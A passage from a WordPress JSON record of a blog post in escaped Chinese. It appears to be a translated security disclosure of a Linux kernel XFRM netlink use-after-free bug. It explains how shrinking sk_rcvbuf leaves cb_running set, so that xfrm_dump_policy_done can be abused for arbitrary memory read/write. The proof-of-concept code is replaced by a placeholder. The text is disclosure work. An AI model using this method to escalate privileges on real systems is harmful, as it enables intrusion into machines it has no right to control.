sk_rcvbuf\u7684\u503c\u4e3a\u7279\u5b9a\u7684\u8303\u56f4\u3002\u901a\u8fc7recvmsg\/recv\/read\u63a5\u6536\u6570\u636e\u65f6\uff0csk_rcvbuf\u8868\u793a\u63a5\u6536\u7f13\u51b2\u533a\u7684\u5927\u5c0f\u3002 sk_rcvbuf\u503c\u662f\u5185\u6838\u4e3askb\uff08sk_buff\u7ed3\u6784\u4f53\u5bf9\u8c61\uff09\u5206\u914d\u7684\u5927\u5c0f\u3002 skb-> truesize\u662f\u4e00\u4e2a\u53d8\u91cf\uff0c\u5b83\u4fdd\u6301\u5bf9\u5df2\u4f7f\u7528\u5185\u5b58\u7684\u8ffd\u8e2a\uff0c\u4e3a\u4e86\u907f\u514d\u5185\u5b58\u6d6a\u8d39\uff0c\u65b9\u4fbf\u7ba1\u7406\uff0c\u5185\u6838\u53ef\u4ee5\u5728\u8fd0\u884c\u65f6\u6539\u53d8skb\u7684\u5927\u5c0f\u3002 \u4f8b\u5982\uff0c\u5982\u679c\u6211\u4eec\u5206\u914d\u4e00\u4e2a\u5927\u7684\u5957\u63a5\u5b57\u7f13\u51b2\u533a\uff08skb\uff09\uff0c\u800c\u6211\u4eec\u53ea\u63a5\u6536\u52301\u5b57\u8282\u5927\u5c0f\u7684\u6570\u636e\u5305\uff0c\u5185\u6838\u5c06\u901a\u8fc7\u8c03\u7528skb_set_owner_r\u6765\u8c03\u6574skb-> 
truesize\u7684\u5927\u5c0f\u3002 \u901a\u8fc7\u8c03\u7528skb_set_owner_r\u4fee\u6539sk-> sk_rmem_alloc\uff08\u5f15\u7528\u81ea\u539f\u5b50\u53d8\u91cfsk-> sk_backlog.rmem_alloc\uff09\u3002 \u5f53\u521b\u5efaXFRM netlink \u5957\u63a5\u5b57\u65f6\uff0c\u4f1a\u8c03\u7528xfrm_dump_policy\u51fd\u6570\uff0c\u5f53\u6211\u4eec\u5173\u95ed\u5957\u63a5\u5b57\u65f6\uff0cxfrm_dump_policy_done\u4f1a\u88ab\u8c03\u7528\u3002 \u5f53netlink_sock\u5bf9\u8c61\u7684cb_running\u503c\u4e3atrue\u65f6\u8c03\u7528xfrm_dump_policy_done\u3002 xfrm_dump_policy_done\u4f1a\u5c1d\u8bd5\u6e05\u7406\u7531netlink_callback\u5bf9\u8c61\u7ba1\u7406\u7684xfrm walk\u6761\u76ee\u3002 \u5f53\u8c03\u7528netlink_skb_set_owner_r\uff08\u5982skb_set_owner_r\uff09\u65f6\uff0c\u5b83\u4f1a\u66f4\u65b0sk_rmem_alloc\u3002 netlink_dump(): \u5728\u4e0a\u9762\u7684\u4ee3\u7801\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u5f53sk-> sk_rcvbuf\u5c0f\u4e8esk_rmem_alloc\uff08\u6ce8\u610f\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7setsockopt\u63a7\u5236sk-> sk_rcvbuf\uff09\u65f6\uff0cnetlink_dump()\u9a8c\u8bc1\u5931\u8d25\u3002 \u5f53\u6ee1\u8db3sk-> sk_rcvbuf\u5c0f\u4e8esk_rmem_alloc\u65f6\uff0c\u4f1a\u8df3\u8f6c\u5230\u51fd\u6570\u7684\u7ed3\u5c3e\uff0c\u7136\u800ccb_running\u7684\u503c\u8fd8\u6ca1\u6709\u88ab\u66f4\u6539\u4e3afalse\uff0cnetlink_dump()\u51fd\u6570\u5c31\u8fd4\u56de\u4e86\u3002 \u6b64\u65f6nlk-> cb_running\u4e3atrue\uff0c\u56e0\u6b64\u4f1a\u8c03\u7528xfrm_dump_policy_done()\u3002 nlk-> cb.done\u6307\u5411xfrm_dump_policy_done\uff0c\u503c\u5f97\u6ce8\u610f\u7684\u662f\u8fd9\u4e2a\u51fd\u6570\u5904\u7406\u4e00\u4e2a\u53cc\u5411\u94fe\u8868\uff0c\u6240\u4ee5\u5982\u679c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u5f15\u7528\u4e00\u4e2a\u53ef\u63a7\u7684\u7f13\u51b2\u533a\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5b9e\u73b0\u4efb\u610f\u5185\u5b58\u8bfb\u5199\u3002 \u6f0f\u6d1e\u8bc1\u660e \u4e0b\u9762\u7684\u4ee3\u7801\u5728Ubuntu 17.04\u6d4b\u8bd5\u3002 
[crayon-5a2f0459e8bd9379864677\/]<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,11946,10757,13145],"class_list":["post-10805","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-privilege-escalation","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10805","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10805"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10805\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10805"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10805"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10805"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}